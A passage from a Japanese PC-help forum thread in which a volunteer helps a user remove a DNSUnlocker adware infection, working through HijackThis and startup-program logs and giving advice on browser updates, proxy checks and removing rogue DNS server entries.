O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 12001 bytes


cc インストール-----------------

7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/09/24 17.4 MB 19.0.0.185
Adobe Flash Player 19 NPAPI Adobe Systems Incorporated 2015/09/24 17.9 MB 19.0.0.185
Adobe Reader X (10.1.15) MUI 2015/09/07
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/24 18.1 MB 46.0.2490.13
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/10/03 3.10.7
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/09 45.0.2454.101
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3
Mozilla Maintenance Service Mozilla 2015/09/13 233 KB 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
PDF-Viewer Tracker Software Products Ltd 2015/09/26 23.5 MB 2.5.315.0
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/26 10.2 MB 7.4.0.9058
Skype(TM) 7.10 Skype Technologies S.A. 2015/09/26 72.6 MB 7.10.101
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
VLC media player VideoLAN 2015/09/07 2.2.1
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc ie------------------------------

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc chorome--------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.8 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0
有効 Extension Adblock Plus 1.9.3 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.3_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.5 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.5_0


cc firefox--------------------------------

有効 Extension Score Viewer for beatmania IIDX 22 PENDUAL 2.2 nob_m default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\extensions\ScoreViewerForIIDX22@nob_m.com.xpi
無効 Extension Skype Click to Call 7.4.0.9058 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 40.0.3 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.15 Google Inc. default Firefox 40.0.3 C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 40.0.3 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 40.0.3 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin OpenH264 Video Codec 1.4 default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\gmp-gmpopenh264\1.4\gmpopenh264.dll
有効 Plugin Primetime Content Decryption Module provided by Adobe Systems, Incorporated 13 Adobe Systems Inc default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\gmp-eme-adobe\13\eme-adobe.dll
有効 Plugin Shockwave Flash 19.0.0.185 Adobe Systems Incorporated default Firefox 40.0.3 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 40.0.3 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc スケジュールされたタスク-----------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar


cc コンテキストメニュー ------------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\kaito\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
  • あすとろ
  • 2015/10/05 (Mon) 12:36:43
返信フォームへ 
2つほど更新を
こんばんは。
様子見後の報告ですね。

>指示された通り様子見をしてみましたが以前のように問題なく使えていると思います。

異常は出てないようで何よりです。
ただ、ログを見ると少し問題点が見えてますね。
これを修正しましょう。

>MSIE: Internet Explorer v9.00 (9.00.8112.16659)

IEがまだ最新版のIE11になってません。
これだけでも脆弱性を突かれて危険な感染する恐れが高いので、Win7 64bit版のIE11をダウンロード、インストールしてください。
http://blogs.technet.com/b/cs3_windows/archive/2014/07/14/502-windows-7-internet-explorer-11.aspx

それと下記も更新必須です。
>Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3

上記2つの更新できたら、再度HJTとインストール情報ログだけ取り直して、それを見せてください
  • 悪代官
  • 2015/10/05 (Mon) 19:34:46
返信フォームへ 
Re: DNSunlockerの感染
遅れました、firefoxは更新できたのですがieの方は先日windows updateができなかったのと同じ理由で更新できない状態です。

色々と検索して試してみましたが解決には至らなかったので状況報告としてレスします。
  • あすとろ
  • 2015/10/08 (Thu) 15:40:12
返信フォームへ 
HJTで少し作業も
こんばんは。
今日も遅くなってごめんなさい。

>firefoxは更新できたのですがieの方は先日windows updateができなかったのと同じ理由で更新できない状態です。

はい、下記のダウンロードページで「日本語、Win7 64bit」版のIEをダウンロードできないということでしょうか?
http://windows.microsoft.com/ja-jp/internet-explorer/ie-11-worldwide-languages

これができないとするとまだ問題は残っているようです。
先に見せてもらったログでもまだいくつか見えています。

では以下の確認と作業をお願いします。

まず先に見てもらったはずの下記ページの要領で、プロキシ設定の確認して、改ざんが見つかったらそれを修正してください。
http://note.chiebukuro.yahoo.co.jp/detail/n335704

見当たらなければ今度はセーフモードでHJTを起動してスキャン後に下記エントリをfixしてください。
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

このあとPCを通常モードで再起動後、再度HJTでスキャンだけしてそのログを保存しておいてください。

作業後にしばらく様子見後、まだ同じ異常が続いているかどうかの報告と、取り直しのHJTログをレスください
  • 悪代官
  • 2015/10/08 (Thu) 20:11:15
返信フォームへ 
Re: DNSunlockerの感染
こちらこそ返信が遅れて申し訳ありません。

>はい、下記のダウンロードページで「日本語、Win7 64bit」版のIEをダウンロードできないということでしょうか?

説明不足でした、DL自体はできるのですがインストールしようとすると「オンラインにして必要なプログラムをインストールしてから、internet explorerのインストールページに戻ってセットアップを再度実行します」というポップアップが出てきてインストールができない状態です。

指定されたエントリを削除した後、以前IVNOさんが作ってくださったパッチファイルをあてて再度windows updateを試してみましたが依然変わらないままでした。

ではhjtのログを貼っていきます。


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:13:27, on 2015/10/12
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 41.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
